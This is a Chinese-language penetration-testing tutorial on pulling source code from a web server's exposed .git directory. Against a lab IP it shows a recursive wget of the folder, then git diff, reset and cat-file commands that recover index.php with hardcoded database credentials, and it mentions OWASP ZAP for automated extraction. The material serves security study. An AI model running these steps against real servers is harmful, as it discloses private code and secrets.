通常情况:
检查 git repository最简单的方法是查找.git文件夹
可以使用Nessus, Nikto, 和nmap等工具来完成该任务。
通常我会首先检查config文件
接下来获取.git文件夹下的所有文件:
wget -r http://192.168.37.128/.git/
我们获得了web服务器的Git repository
root@kali:~/192.168.37.128: ls -al total 12 drwxr-xr-x 3 root root 4096 Dec 26 14:28 . drwxr-xr-x 19 root root 4096 Dec 26 14:28 .. drwxr-xr-x 8 root root 4096 Dec 26 14:28 .git root@kali:~/192.168.37.128#
git status可以查看本地和web server的区别:
root@kali:~/192.168.37.128: git status # On branch master # Changes not staged for commit: # (use "git add/rm <file>..." to update what will be committed) # (use "git checkout -- <file>..." to discard changes in working directory) # # deleted: index.php # no changes added to commit (use "git add" and/or "git commit -a")
可以看到在我们的repository中缺少index.php文件
对于文件很少的repositories ,我们可以diff区别来查看我们缺少的文件的内容:
root@kali:~/192.168.37.128: git diff diff --git a/index.php b/index.php deleted file mode 100644 index 2bd0989..0000000 --- a/index.php +++ /dev/null @@ -1,13 +0,0 @@ -Hello World! - -<?php -$servername = "localhost"; -$username = "admin"; -$password = "password"; - -$conn = new mysqli($servername, $username, $password); - -if ($conn->connect_error) { - die("Connection failed: " . $conn->connect_error); -} -?>
这样我们就可以看到index.php文件。
可以使用 git reset –hard来回到上一次commit时的状态。
root@kali:~/192.168.37.128: git reset --hard HEAD is now at ec53e64 hello world root@kali:~/192.168.37.128: ls -al total 16 drwxr-xr-x 3 root root 4096 Dec 26 14:37 . drwxr-xr-x 19 root root 4096 Dec 26 14:28 .. drwxr-xr-x 8 root root 4096 Dec 26 14:37 .git -rw-r--r-- 1 root root 238 Dec 26 14:37 index.php root@kali:~/192.168.37.128:
git在objects文件中存储文件信息:
root@kali:~/192.168.37.128/.git/objects: ls -al total 64 drwxr-xr-x 16 root root 4096 Dec 26 14:28 . drwxr-xr-x 8 root root 4096 Dec 26 14:37 .. drwxr-xr-x 2 root root 4096 Dec 26 14:28 04 drwxr-xr-x 2 root root 4096 Dec 26 14:28 07 drwxr-xr-x 2 root root 4096 Dec 26 14:28 26 drwxr-xr-x 2 root root 4096 Dec 26 14:28 2b drwxr-xr-x 2 root root 4096 Dec 26 14:28 83 drwxr-xr-x 2 root root 4096 Dec 26 14:28 8d drwxr-xr-x 2 root root 4096 Dec 26 14:28 8f drwxr-xr-x 2 root root 4096 Dec 26 14:28 93 drwxr-xr-x 2 root root 4096 Dec 26 14:28 ae drwxr-xr-x 2 root root 4096 Dec 26 14:28 ec drwxr-xr-x 2 root root 4096 Dec 26 14:28 f2 drwxr-xr-x 2 root root 4096 Dec 26 14:28 f3 drwxr-xr-x 2 root root 4096 Dec 26 14:28 info drwxr-xr-x 2 root root 4096 Dec 26 14:28 pack
有一些只有两个字符的文件夹,他们里面含有一些随机字符命名的文件:
引用
root@kali:~/192.168.37.128/.git/objects/2b: ls -al
total 12
drwxr-xr-x 2 root root 4096 Dec 26 14:28 .
drwxr-xr-x 16 root root 4096 Dec 26 14:28 ..
-rw-r--r-- 1 root root 171 Dec 26 13:32 d098976cb507fc498b5e8f5109607faa6cf645
这些文件夹和其中的文件实际上为blob数据创建SHA-1。每个SHA-1含有repository中每个文件的bits/pieces。
我们可以使用下面的命令查看index.php的SHA-1信息
git cat-file -p master^{tree}
root@kali:~/192.168.37.128/.git: git cat-file -p master^{tree} 100644 blob 2bd098976cb507fc498b5e8f5109607faa6cf645 index.php
该命令的作用是显示master分支中的每个文件的SHA-1
我们可以把这些SHA-1传递给git cat-file 来显示文件内容
root@kali:~/192.168.37.128/.git: git cat-file -p 2bd098976cb507fc498b5e8f5109607faa6cf645 Hello World! <?php $servername = "localhost"; $username = "admin"; $password = "password"; $conn = new mysqli($servername, $username, $password); if ($conn->connect_error) { die("Connection failed: " . $conn->connect_error); } ?>
OWASP Zed Attack Proxy (ZAP) 可以自动从暴露的git文件夹中提取文件(通常是app的代码)。ZAP的一个优点是它不需要设置directory listing为启动状态。相反ZAP匹配内部git文件然后直接提取代码而不需要依赖额外的工具,例如git客户端。
ZAP还可以提取SVN文件夹。